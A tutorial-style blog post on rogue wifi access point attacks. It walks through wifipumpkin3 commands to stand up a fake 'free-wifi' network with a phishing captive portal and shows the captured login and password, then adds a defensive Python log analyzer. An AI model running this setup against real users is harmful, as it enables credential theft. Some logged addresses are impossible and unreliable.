When going to McDonald's, a restaurant or even a regular coffee shop, there are times when we take advantage of their open wifi network. This is especially convenient when we plan to stay longer and work on our projects. However, it carries quite a few risks. One example is the rogue access point attack, to which this post is dedicated.
What is an access point?
To provide Internet connectivity in the home environment, most of us use a router, which distributes the connection, over cable or wirelessly, to the network adapters in our computers. The router creates its own home network and assigns individual IP addresses to the connected devices. Depending on the model, the router has different interfaces.
An access point, on the other hand, is the part of the router (device) without which we would not be able to connect to the network. It has the same network interfaces as the router: the first allows communication with the Internet via a network cable and the router, the second allows further user devices to join the network.
A rogue access point is thus an access point installed on a network without the permission of its owner. An attacker who runs a fake access point is able to intercept requests, which creates the risk of stealing sensitive user data, among other things.
wifipumpkin3
Wifipumpkin3 is a tool that can carry out, among other things, the attack described above. Let's see how.
After installing the tool and running the proxies command inside it, we get information about the available proxies.
Proxy | Active | Port | Description
--------------+----------+--------+-------------------------------------------------------
captiveflask | False | 80 | Allow block Internet access for users until they o...
noproxy | False | 80 | Runnning without proxy redirect traffic
pumpkinproxy | True | 8080 | Transparent proxies that you can use to intercept ...
The tool provides three possible proxy settings. The first ensures that users can only access the Internet after they pass through the login page (where we can try to force the user to enter credentials). The second disables the proxy, and the last, enabled by default, lets us capture traffic and display it in a panel created specifically for this purpose. So let's try using the captiveflask proxy. To do this, use the command:
wp3 > set proxy captiveflask true
After typing proxies again, you will notice that captiveflask has been activated along with the captive portal DarkLogin.
wp3 > proxies
[*] Available proxies:
======================
Proxy | Active | Port | Description
--------------+----------+--------+-------------------------------------------------------
captiveflask | True | 80 | Allow block Internet access for users until they o...
noproxy | False | 80 | Runnning without proxy redirect traffic
pumpkinproxy | False | 8080 | Transparent proxies that you can use to intercept ...
[*] Captive Portal plugins:
===========================
Name | Active
-----------+----------
DarkLogin | True
FlaskDemo | False
Login_v4 | False
loginPage | False
What does this mean for us? That a template named DarkLogin will be used. To set a different template, we will type:
wp3 > set captiveflask.
captiveflask.DarkLogin captiveflask.FlaskDemo.ptBr
captiveflask.FlaskDemo captiveflask.force_redirect_sucessful_template
captiveflask.FlaskDemo.Default captiveflask.loginPage
captiveflask.FlaskDemo.En captiveflask.Login_v4
Pressing Tab displays the possible options. In our example, we choose:
wp3 > set captiveflask.loginPage true
Let's move on to access points. We can view our available, configured access point with the ap command.
wp3 > ap
[*] Settings AccessPoint:
=========================
BSSID | SSID | Channel | Interface | Status | Security
-------------------+----------------+-----------+-------------+-------------+------------
AC:B6:85:33:16:7C | WiFi Pumpkin 3 | 11 | None | not Running | false
Let's change its name from WiFi Pumpkin 3 to free-wifi.
wp3 > set ssid free-wifi
wp3 > ap
[*] Settings AccessPoint:
=========================
BSSID | SSID | Channel | Interface | Status | Security
-------------------+-----------+-----------+-------------+-------------+------------
AC:B6:85:33:16:7C | free-wifi | 11 | None | not Running | false
As you can see, the interface for our access point is not set. We can check the available interfaces by running the ifconfig command. In our case, we will use the wlo1 interface.
wp3 > set interface wlo1
wp3 > ap
[*] Settings AccessPoint:
=========================
BSSID | SSID | Channel | Interface | Status | Security
-------------------+-----------+-----------+-------------+-------------+------------
BC:F6:85:03:36:5B | free-wifi | 11 | wlo1 | not Running | false
With the configuration set, we can proceed to expose the access point to the world.
wp3 > start
As you can see, it is possible to connect to the newly created wifi network.
After joining, the user should be taken to the login panel.
At the same time, in the terminal, we get information about the victim's connection to our access point together with the intercepted requests.
[*] 81:15:72:fh:06:86 client join the AP
[ pydhcp_server ] 21:02:24 - SEND to ('0.0.0.0', 68):
::Header::
op: BOOTREPLY
hwmac: MAC('81:15:72:fh:06:86')
flags:
hops: 0
secs: 0
xid: 105676842
siaddr: IPv4Address('0.0.0.0')
giaddr: IPv4Address('0.0.0.0')
ciaddr: IPv4Address('0.0.0.0')
yiaddr: IPv4Address('10.0.0.21')
sname: ''
file: ''
::Body::
[X][001] subnet_mask: IPv4Address('255.0.0.0')
[X][003] router: [IPv4Address('10.0.0.1'), IPv4Address('8.8.8.8')]
[X][006] domain_name_servers: [IPv4Address('10.0.0.1')]
[ ][012] hostname: 'DESKTOP-9P879SS'
[X][051] ip_address_lease_time: 7200
[-][053] dhcp_message_type: DHCP_ACK
[X][054] server_identifier: IPv4Address('10.0.0.1')
[ ][081] client_fqdn: '\x00\x00\x00DESKTOP-9Ph29aS'
[ captiveflask ] 21:02:59 - 10.0.0.21 - - [05/Nov/2021 21:02:58] "GET /connecttest.txt HTTP/1.1" 302 -
[ sniffkin3 ] 21:02:59 - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt
[ captiveflask ] 21:02:59 - 10.0.0.21 - - [05/Nov/2021 21:02:59] "GET /connecttest.txt HTTP/1.1" 302 -
[ sniffkin3 ] 21:02:59 - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt
[ captiveflask ] 21:03:00 - 10.0.0.21 - - [05/Nov/2021 21:03:00] "GET /connecttest.txt HTTP/1.1" 302 -
[ sniffkin3 ] 21:03:00 - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt
[ captiveflask ] 21:03:00 - 10.0.0.21 - - [05/Nov/2021 21:03:00] "GET /connecttest.txt HTTP/1.1" 302 -
[ sniffkin3 ] 21:03:00 - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt
[ captiveflask ] 21:03:37 - 10.0.0.21 - - [05/Nov/2021 21:03:37] "GET / HTTP/1.1" 302 -
[ sniffkin3 ] 21:03:37 - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/
[ captiveflask ] 21:03:37 - 10.0.0.21 - - [05/Nov/2021 21:03:37] "GET /login?orig_url=http%3A%2F%2F10.0.0.1%2F HTTP/1.1" 200 -
[ sniffkin3 ] 21:03:37 - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/login?orig_url=http%3A%2F%2F10.0.0.1%2F
[ sniffkin3 ] 21:03:38 - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/static/css/bootstrap.min.css
[ captiveflask ] 21:03:38 - 10.0.0.21 - - [05/Nov/2021 21:03:37] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 -
10.0.0.21 - - [05/Nov/2021 21:03:38] "GET /static/js/jquery-1.11.1.min.js HTTP/1.1" 200 -
10.0.0.21 - - [05/Nov/2021 21:03:38] "GET /static/js/bootstrap.min.js HTTP/1.1" 200 -
[ sniffkin3 ] 21:03:38 - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/static/js/jquery-1.11.1.min.js
[ sniffkin3 ] 21:03:38 - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/static/js/bootstrap.min.js
[ captiveflask ] 21:03:38 - 10.0.0.21 - - [05/Nov/2021 21:03:38] "GET /static/images/avatar_2x.png HTTP/1.1" 200 -
[ captiveflask ] 21:03:38 - 10.0.0.21 - - [05/Nov/2021 21:03:38] "GET /favicon.ico HTTP/1.1" 404 -
[ sniffkin3 ] 21:03:38 - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/static/images/avatar_2x.png
[ sniffkin3 ] 21:03:38 - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/favicon.ico
[ captiveflask ] 21:03:53 - 10.0.0.21 - - [05/Nov/2021 21:03:53] "GET /connecttest.txt HTTP/1.1" 302 -
[ captiveflask ] 21:03:53 - 10.0.0.21 - - [05/Nov/2021 21:03:53] "GET /connecttest.txt HTTP/1.1
[ sniffkin3 ] 21:03:53 - [ 10.0.0.21 > 13.493.4.13 ] GET www.msftconnecttest.com/connecttest.txt
[ captiveflask ] 21:03:53 - " 302 -
[ sniffkin3 ] 21:03:53 - [ 10.0.0.21 > 13.493.4.13 ] GET www.msftconnecttest.com/connecttest.txt
[ captiveflask ] 21:03:53 - 10.0.0.21 - - [05/Nov/2021 21:03:53] "GET /connecttest.txt HTTP/1.1" 302 -
[ sniffkin3 ] 21:03:53 - [ 10.0.0.21 > 13.493.4.13 ] GET www.msftconnecttest.com/connecttest.txt
[ captiveflask ] 21:03:53 - 10.0.0.21 - - [05/Nov/2021 21:03:53] "GET /connecttest.txt HTTP/1.1" 302 -
After the client enters the sensitive data and submits the form, the console shows us:
[ sniffkin3 ] 21:03:53 - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt
[ captiveflask ] 21:03:55 - {'10.0.0.21': {'login': 'bugspace@bugspace.pl', 'password': 'bugspacepassword'}}
[*] CaptiveFlask credentials:
=============================
IP | Login | Password
-----------+----------------------+------------------
10.0.0.21 | bugspace@bugspace.pl | bugspacepassword
[ sniffkin3 ] 21:03:56 - [ 10.0.0.21 > 10.0.0.1 ] POST 10.0.0.1/login?orig_url=http%3A%2F%2F10.0.0.1%2F
payload: login=bugspace%40bugspace.pl&password=bugspacepassword
Username: bugspace%40bugspace.pl
Password: bugspacepassword
[ sniffkin3 ] 21:03:56 - [ 10.0.0.21 > 10.0.0.1 ] POST 10.0.0.1/login?orig_url=http%3A%2F%2F10.0.0.1%2F
[ sniffkin3 ] 21:03:56 - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/
[ sniffkin3 ] 21:03:56 - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/login?orig_url=http%3A%2F%2F10.0.0.1%2F
[ captiveflask ] 21:03:56 - 10.0.0.21 - - [05/Nov/2021 21:03:55] "POST /login?orig_url=http%3A%2F%2F10.0.0.1%2F HTTP/1.1" 302 -
10.0.0.21 - - [05/Nov/2021 21:03:55] "GET / HTTP/1.1" 302 -
10.0.0.21 - - [05/Nov/2021 21:03:55] "GET /login?orig_url=http%3A%2F%2F10.0.0.1%2F HTTP/1.1" 200 -
Thus, we have obtained the user's login and password.
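To make the console output above concrete from the client's side (why the device opened the sign-in panel, and that the form crossed the network in cleartext), here is an added Python example that is not part of wifipumpkin3: it parses lines in the captiveflask and sniffkin3 formats shown above and reports what happened to the client. The probe-host list, the finding names and the sample lines (copied from the session above) are my own assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Hosts that operating systems probe for Internet access. Windows fetches
# www.msftconnecttest.com/connecttest.txt and expects 200 "Microsoft Connect Test";
# the 302 to a login page seen above is what makes it open the sign-in view.
PROBE_HOSTS = {"www.msftconnecttest.com", "connectivitycheck.gstatic.com", "captive.apple.com"}

# Line formats as printed above: the portal's access log, the sniffer, and the sniffed POST body.
CAPTIVE_RE = re.compile(r'^\[ captiveflask \] \S+ - (?P<src>\S+) - - \[[^\]]+\] '
                        r'"(?P<method>\w+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
SNIFF_RE = re.compile(r'^\[ sniffkin3 \] \S+ - \[ (?P<src>\S+) > (?P<dst>\S+) \] '
                      r'(?P<method>\w+) (?P<url>\S+)')
PAYLOAD_RE = re.compile(r'^\s*payload: (?P<body>\S+)')

# Constructed sample: the key lines from the session above, in the order they were printed.
SAMPLE_LOG = """\
[ captiveflask ] 21:02:59 - 10.0.0.21 - - [05/Nov/2021 21:02:58] "GET /connecttest.txt HTTP/1.1" 302 -
[ sniffkin3 ] 21:02:59 - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt
[ captiveflask ] 21:03:37 - 10.0.0.21 - - [05/Nov/2021 21:03:37] "GET /login?orig_url=http%3A%2F%2F10.0.0.1%2F HTTP/1.1" 200 -
[ sniffkin3 ] 21:03:56 - [ 10.0.0.21 > 10.0.0.1 ] POST 10.0.0.1/login?orig_url=http%3A%2F%2F10.0.0.1%2F
payload: login=bugspace%40bugspace.pl&password=bugspacepassword
"""

def analyze(log_text):
    """Return deduplicated (finding, detail) tuples describing what the client went through."""
    lines = log_text.splitlines()
    urls = [urlsplit("http://" + m["url"]) for m in map(SNIFF_RE.match, lines) if m]
    probe_paths = {u.path for u in urls if u.hostname in PROBE_HOSTS}  # e.g. /connecttest.txt
    findings, pending_post = [], None
    for line in lines:
        if (m := CAPTIVE_RE.match(line)) and m["path"] in probe_paths and m["status"][0] == "3":
            # The probe never reached the real host: the portal answered it with a redirect.
            finding = ("probe-redirected", f"{m['src']} {m['path']} -> {m['status']}")
            if finding not in findings:
                findings.append(finding)
        elif m := SNIFF_RE.match(line):
            pending_post = (m["src"], urlsplit("http://" + m["url"])) if m["method"] == "POST" else None
        elif (m := PAYLOAD_RE.match(line)) and pending_post:
            src, url = pending_post
            fields = parse_qs(m["body"])
            if any("pass" in k.lower() for k in fields):
                # Form body went over plain HTTP to the gateway, readable by whoever runs the AP.
                findings.append(("cleartext-credentials",
                                 f"{src} POST {url.hostname}{url.path} fields={sorted(fields)}"))
            pending_post = None
    return findings
```

Running analyze(SAMPLE_LOG) yields one probe-redirected finding (the reason the sign-in panel appeared) and one cleartext-credentials finding for the POST to 10.0.0.1; a probe answered with 200 produces nothing.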
Sources
https://github.com/swagkarna/wifi-pumpkin-v3.0
https://www.khanacademy.org/computing/computers-and-internet/xcae6f4a7ff015e7d:online-data-security/xcae6f4a7ff015e7d:cyber-attacks/a/rogue-access-points-mitm-attacks